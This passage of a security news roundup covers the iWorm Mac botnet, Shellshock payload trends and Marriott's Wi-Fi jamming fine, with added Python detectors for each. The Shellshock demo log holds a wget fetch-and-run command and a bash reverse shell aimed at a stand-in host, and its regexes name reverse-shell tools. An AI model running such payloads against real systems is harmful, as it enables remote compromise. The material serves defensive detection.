staff to other banks over the last year, with others expected to leave
soon.
A RUSSIAN SECURITY FIRM has
discovered a botnet that has hit over 17,000 Apple Mac computers, using
information posted in messages on social media website Reddit to
navigate.
Researchers at Russian antivirus company Dr Web said in a report
that the sophisticated "multi-purpose backdoor" malware that it dubbed
"Mac.Backdoor.iWorm" has infected more than 17,000 computers running Mac
OS X by allowing criminals to issue commands to carry out a wide range
of instructions on the infected machines.
"Criminals developed this malware using C++ and Lua. It should also
be noted that the backdoor makes extensive use of encryption in its
routines," said Dr Web in its report. "During installation it is
extracted into /Library/Application Support/JavaW, after which the
dropper generates a p-list file so that the backdoor is launched
automatically."
Compromised computers receive commands from servers under the control
of botmasters, using information posted in messages on Reddit as
navigational aids. Mac.Backdoor.iWorm opens a port on the infected
computer and awaits an incoming connection; it also sends a request to
a remote website to acquire a list of command and control (C&C)
servers, then connects to those servers and waits for instructions.
"It is worth mentioning that in order to acquire a control server
address list, the bot uses the search service at reddit.com, and - as a
search query - specifies hexadecimal values of the first 8 bytes of the
MD5 hash of the current date," said Dr Web. "The reddit.com search
returns a web page containing a list of botnet C&C servers and ports
published by criminals in comments to the post minecraftserverlists
under the account vtnhiaovyd."
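The reddit search query is effectively a daily rendezvous token, and that cuts both ways: a defender who knows the recipe can compute the same token and look for it in proxy logs, or read the comment thread before the bots do. The following is an added example, not Dr Web's code or the malware's; it assumes an ISO YYYY-MM-DD date string as the MD5 input because the report quoted above does not give the exact format, and the proxy-log records are constructed for the demo.

```python
import hashlib
from datetime import date, timedelta
from urllib.parse import parse_qs, urlsplit

# ASSUMPTION: the Dr Web report does not say how the date is formatted
# before it is hashed, so ISO "YYYY-MM-DD" stands in for the real format.
DATE_FORMAT = "%Y-%m-%d"
TODAY = date(2014, 10, 2)  # pinned so the demo is reproducible


def iworm_search_token(day, fmt=DATE_FORMAT):
    """First 8 bytes of MD5(date string), as 16 lowercase hex characters."""
    digest = hashlib.md5(day.strftime(fmt).encode("ascii")).digest()
    return digest[:8].hex()


def token_window(today, days_back=1, days_forward=1):
    """Tokens a bot could be using around `today` (clock skew, time zones)."""
    return {iworm_search_token(today + timedelta(days=d)): today + timedelta(days=d)
            for d in range(-days_back, days_forward + 1)}


def is_iworm_lookup(host, path, today):
    """True if a request is a reddit search whose q= is a current token."""
    if host != "reddit.com" and not host.endswith(".reddit.com"):
        return False
    parts = urlsplit(path)
    if parts.path != "/search":
        return False
    window = token_window(today)
    return any(q.strip().lower() in window
               for q in parse_qs(parts.query).get("q", []))


# Constructed proxy-log records (client, host, request path); not real data.
SAMPLE_PROXY_LOG = [
    ("10.1.2.3", "www.reddit.com", f"/search?q={iworm_search_token(TODAY)}"),
    ("10.1.2.4", "www.reddit.com", "/search?q=minecraftserverlists"),
    ("10.1.2.5", "www.reddit.com",
     f"/search?q={iworm_search_token(TODAY - timedelta(days=1))}&sort=new"),
    ("10.1.2.6", "www.example.com", f"/search?q={iworm_search_token(TODAY)}"),
]


def scan_proxy_log(records, today):
    """Clients whose requests look like the iWorm C&C-list lookup."""
    return [client for client, host, path in records
            if is_iworm_lookup(host, path, today)]


if __name__ == "__main__":
    print("today's token:", iworm_search_token(TODAY))
    print("suspect clients:", scan_proxy_log(SAMPLE_PROXY_LOG, TODAY))
```

Checking a day either side of today covers time-zone and clock-skew differences between the bot and the proxy; a 16-hex-character search term on reddit is unusual enough that a match is worth a look even before the comment thread is confirmed.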
Security expert Graham Cluley said on his blog that, while it isn't presently documented how the malware spreads, the consequences clearly can be serious.
"Like any computers that have been recruited into a botnet, Macs that
have been hijacked in this attack could have information stolen from
them, further malware planted upon them, or be used to spread more
malware or launch spam campaigns and denial of service attacks," Cluley
explained.
Security firm Lancope CTO TK Keanini added that the botnet "will
begin to co-evolve as countermeasures are put in place and they
engineer and innovate around them".
The US Defense Advanced Research Projects Agency (DARPA) has warned that users of the internet will never be fully secure.
DARPA director Arati Prabhakar made the claim during the Washington Post's
Cybersecurity Summit, arguing that the only way fully to secure the
internet is to seal it off and make it available only to selected
people.
"The power of information technology, and the reason we put up with
all these problems, is that it is phenomenally capable for all the
things that change how we live and how we work and how we create
national security," she said.
"You don't want to cut out any of that capability in the process of building cyber security."
Prabhakar added that, while wholly securing the internet is
impossible, DARPA is working on new ways to track hackers and criminals
operating on the Dark Web.
She listed the need for increased computing power and more advanced,
scalable big data analytics tools as key challenges in this endeavour.
"[When searching for cyber criminals] you start by creating a
different way to look at this vast information environment," she said.
"The moon shot for cyber security, in my view, is to find techniques that scale faster than the explosion in information."
Prabhakar revealed that DARPA began working on advanced big data solutions in March, and is also working on several projects designed to bolster global cyber security levels.
She highlighted a research project to create an "unhackable system"
as particularly important owing to its potential application in critical
infrastructure.
"What [the unhackable software project] means is there is a
mathematical proof that this particular function can't be hacked from a
pathway that wasn't intended," she said. "That won't solve the entire
problem, but it might make it more manageable."
Attacks on critical infrastructure are a problem facing governments
across the globe owing to their use of insecure SCADA systems.
These concerns peaked in September when researchers uncovered a
critical bug, codenamed Shellshock, in the Bash shell used on Unix and
Unix-like systems, which could in theory be exploited to attack SCADA
systems.
Malicious and benign attacks against systems vulnerable to Shellshock
had halved by Sunday after peaking three days following the bug's
disclosure, Akamai researchers say.
The variety of payloads
targeting vulnerable sites increased dramatically over the same period
before tapering off, in a possible sign that hackers were bored with the
bug.
The number of unique payloads increased from 43 on day zero to a
whopping 10,716 just 24 hours later. It peaked on 27 September at 20,753
before falling off.
The numbers demonstrated the effectiveness of
Shellshock as an attack vector, researchers Ezra Caltum, Adi Ludmer and
Ory Segal wrote in a co-authored post.
"One
of the troubling aspects of the Shellshock vulnerability is the ease of
exploitation, which can be seen by the dramatic increase in the number
of unique payloads between the first and the second days," they said.
"The
sheer number of creative payloads also demonstrates how effective and
deadly this vulnerability can be – most of the scanning and exploitation
process is already fully automated.
"With such a low barrier to
entry, and the simplicity of writing powerful exploits, we believe that
Shellshock-based attacks are going to stay around for months if not
years, and will probably top the botnet infection method charts in the
near future."
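Because a Shellshock probe has to put the bash function marker `() {` into something the server copies into an environment variable, typically a request header, the payloads Akamai counted are visible in ordinary web-server logs. The script below is an added example, not Akamai's tooling: it pulls the command tail out of Apache combined-format log lines and sorts it into coarse buckets like the ones the researchers describe. The log lines are constructed for the demo and the bucket patterns are illustrative assumptions.

```python
import re

# The bash exported-function marker: a value starting "() {" was parsed
# by a vulnerable bash as a function definition, and everything after
# the closing brace was executed too.  Servers that copy request headers
# into CGI environment variables (HTTP_USER_AGENT, HTTP_REFERER, ...)
# are where the probes land, so the payload shows up in the access log.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;(?P<tail>.*)")

# Coarse payload buckets, first match wins.  Illustrative assumptions,
# not the categories or patterns Akamai used.
CATEGORIES = [
    ("downloader", re.compile(r"\b(wget|curl|fetch|tftp)\b", re.I)),
    ("reverse-shell", re.compile(r"/dev/tcp/|\bnc\b.*\s-e\b|\bsocket\b", re.I)),
    ("prank", re.compile(r"\b(eject|cdrom|aplay|play)\b", re.I)),
    ("recon", re.compile(r"\buname\b|\bid\b|\bwhoami\b|/etc/passwd", re.I)),
    ("probe", re.compile(r"\b(echo|ping|sleep)\b", re.I)),
]

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')


def extract_shellshock_tail(value):
    """Return the command appended after the function body, or None."""
    m = SHELLSHOCK_RE.search(value)
    return m.group("tail").strip() if m else None


def classify_payload(tail):
    for name, rx in CATEGORIES:
        if rx.search(tail):
            return name
    return "other"


def classify_line(line):
    """Parse one log line; return a hit record, or None if it is clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for field in ("ua", "referer", "req"):
        tail = extract_shellshock_tail(m.group(field))
        if tail is not None:
            return {"ip": m.group("ip"), "field": field, "tail": tail,
                    "category": classify_payload(tail)}
    return None


def classify_log(lines):
    return [hit for hit in map(classify_line, lines) if hit]


# Constructed log lines for the demo (addresses are documentation ranges).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :; }; echo; /usr/bin/wget http://198.51.100.9/x.sh -O /tmp/x; sh /tmp/x"',
    '203.0.113.8 - - [25/Sep/2014:10:02:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/eject"',
    '203.0.113.9 - - [25/Sep/2014:10:03:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/ping -c 1 198.51.100.9"',
    '198.51.100.20 - - [25/Sep/2014:10:03:30 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"',
    '203.0.113.10 - - [25/Sep/2014:10:04:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"() { :;}; /bin/bash -i >& /dev/tcp/198.51.100.9/4444 0>&1" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in classify_log(SAMPLE_ACCESS_LOG):
        print(f"{hit['ip']:14} {hit['category']:13} via {hit['field']:8} {hit['tail']}")
```

The same marker is behind the one-line check that circulated at the time, `env x='() { :;}; echo vulnerable' bash -c "echo test"`, which prints "vulnerable" only on an unpatched bash. Note that the marker can arrive in any header the server exports, which is why the script looks at the request line and Referer as well as the User-Agent.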
Two-thirds of the 22,487 unique attacking IP addresses were
from the US, with Germany, Britain and seven other countries sharing the
remainder.
Almost 300,000 gaming domains made up the vast majority of Shellshock
targets, with consumer electronics and email marketing among the less
affected industries.
More than half of all detected Shellshock probes, however, were
unauthorised scans of the sort run in unpaid security research, which
did not attempt exploitation, while about a third were legitimate.
Akamai found eight percent of payloads were attempts by
internet idiots to exploit Shellshock to open CD trays, play audio
files, and dump nonsensical payloads.
More malicious acts including Bitcoin and database stealers made up less than one percent of payloads.
Marriott has been fined $600,000 by the FCC for paralyzing guests'
personal Wi-Fi hotspots, forcing them to use the hotel giant's expensive
network instead.
The US watchdog today said the Marriott Gaylord
Opryland in Nashville, Tennessee, used equipment to illegally boot hotel
and convention center guests off their own networks, which were
typically smartphone hotspots.
Meanwhile, Marriott managers encouraged everyone to connect to the
hotel's Wi-Fi network, which cost from $250 to $1,000 to access.
According to the commission, the Gaylord Opryland installed an Allot
NetEnforcer and configured it to continually flood the surrounding
airspace with de-authentication frames.
A de-authentication frame is an 802.11 management frame that, absent
802.11w protection, carries no authentication of its own: an attacker
does not have to know a Wi-Fi network's password, or be authenticated
in any way, to forge one. A client that receives a de-auth frame
spoofing its access point's address drops its connection, and a frame
sent to the broadcast address knocks every client off that network at
once.
Essentially, it was virtually impossible to use Wi-Fi, unless it was the Marriott's.
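Forged de-authentication frames are easy to spot from the air if you know the frame layout: the first byte of the frame control field carries the type and subtype (0xC0 for a deauth), and a jammer sends them in volume and usually to the broadcast address. Below is an added example, not the FCC's or Allot's code and not a real capture: it builds a small in-memory set of 802.11 frames and runs a sliding-window detector over it. The addresses, timings and reason codes are constructed for the demo, and the window and threshold are illustrative assumptions.

```python
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12
DROP_SUBTYPES = (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH)


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))


def build_frame(ftype, subtype, dst, src, bssid, body=b"", seq=0):
    """Minimal 802.11 frame: frame control (2), duration (2), addr1..3
    (18), sequence control (2), then the body.  Only used to build the
    in-memory capture below; nothing is transmitted."""
    fc0 = (ftype << 2) | (subtype << 4)  # protocol version 0 in the low bits
    header = struct.pack("<BBH", fc0, 0, 0)
    header += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    header += struct.pack("<H", seq << 4)
    return header + body


def parse_frame(raw):
    """Decode the fields a deauth detector needs; None if too short."""
    if len(raw) < 24:
        return None
    fc0 = raw[0]
    info = {"type": (fc0 >> 2) & 0x3, "subtype": (fc0 >> 4) & 0xF,
            "dst": mac_str(raw[4:10]), "src": mac_str(raw[10:16]),
            "bssid": mac_str(raw[16:22]), "reason": None}
    if (info["type"] == TYPE_MGMT and info["subtype"] in DROP_SUBTYPES
            and len(raw) >= 26):
        info["reason"] = struct.unpack_from("<H", raw, 24)[0]  # 2-byte reason code
    return info


def detect_deauth_flood(capture, window_s=10.0, threshold=20):
    """capture: iterable of (timestamp_s, raw_frame).  Flag a transmitter
    address that emits >= threshold deauth/disassoc frames within the
    window.  A real AP deauthenticates the odd client; a jammer does it
    continuously, spoofing the AP, and usually to the broadcast address."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, raw in sorted(capture, key=lambda f: f[0]):
        info = parse_frame(raw)
        if (not info or info["type"] != TYPE_MGMT
                or info["subtype"] not in DROP_SUBTYPES):
            continue
        q = recent[info["src"]]
        q.append(ts)
        while ts - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(info["src"], {
                "src": info["src"], "first": q[0], "last": ts, "count": 0,
                "broadcast": False, "reasons": set()})
            a["count"] = max(a["count"], len(q))
            a["last"] = ts
            a["broadcast"] = a["broadcast"] or info["dst"] == BROADCAST
            a["reasons"].add(info["reason"])
    return list(alerts.values())


# Constructed capture (not a real recording).
AP = "00:11:22:33:44:55"        # the AP whose address the jammer spoofs
OTHER_AP = "66:77:88:99:aa:bb"  # a well-behaved AP for contrast
CLIENT = "aa:bb:cc:dd:ee:01"


def deauth(dst, src, reason, seq=0):
    return build_frame(TYPE_MGMT, SUBTYPE_DEAUTH, dst, src, src,
                       struct.pack("<H", reason), seq)


SAMPLE_CAPTURE = [(i * 0.5, build_frame(TYPE_DATA, 0, OTHER_AP, CLIENT, OTHER_AP, b"\x00" * 8))
                  for i in range(20)]                                # ordinary data frames
SAMPLE_CAPTURE.append((3.0, deauth(CLIENT, OTHER_AP, reason=3)))    # one legitimate deauth
SAMPLE_CAPTURE += [(i * 0.1, deauth(BROADCAST, AP, reason=7, seq=i))
                   for i in range(100)]                              # jammer: 10 per second

if __name__ == "__main__":
    for a in detect_deauth_flood(SAMPLE_CAPTURE):
        print(f"deauth flood from {a['src']}: {a['count']} frames in "
              f"{a['last'] - a['first']:.1f}s, broadcast={a['broadcast']}, "
              f"reasons={sorted(a['reasons'])}")
```

Reason code 7 (class 3 frame received from a non-associated station) is the code deauth tools commonly send, so its constant repetition from one transmitter is itself a hint, and a monitoring-mode card at the venue would have seen exactly this pattern. Detection only tells you it is happening; the fix is 802.11w Protected Management Frames, under which deauth and disassociation frames are integrity-protected and a forged one is discarded, provided both the access point and the client support it.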
"It
is unacceptable for any hotel to intentionally disable personal
hotspots while also charging consumers and small businesses high fees to
use the hotel’s own Wi-Fi network," said FCC enforcement bureau chief Travis LeBlanc.
"This
practice puts consumers in the untenable position of either paying
twice for the same service or forgoing internet access altogether."
The fine is part of a consent decree [PDF]
Marriott has signed in order to end the watchdog's investigation into
Wi-Fi jamming. Marriott has also agreed to send a report on its Wi-Fi
"containment functionality" tools to the commission.
Allot Communications, which makes the NetEnforcer hardware used by
Marriott, did not respond to a request for comment on the matter. It
markets the devices as "purpose-built appliances for monitoring and
managing data traffic on enterprise, cloud and broadband service
provider networks."
Allot has boasted that it provides network services to the Gaylord
Opryland as well as Gaylord hotels in Florida, Texas and Maryland.
"In each of
the facilities, dedicated internet service is provided by a Gigabit
fiber-optic backbone with 100 megabit edge connections for meeting
rooms, ballrooms and exhibit hall space," the company writes [PDF].
"Each resort provides an always-up installation that serves thousands of internet users every day of the year."
Thousands of users ... willing or not, it seems.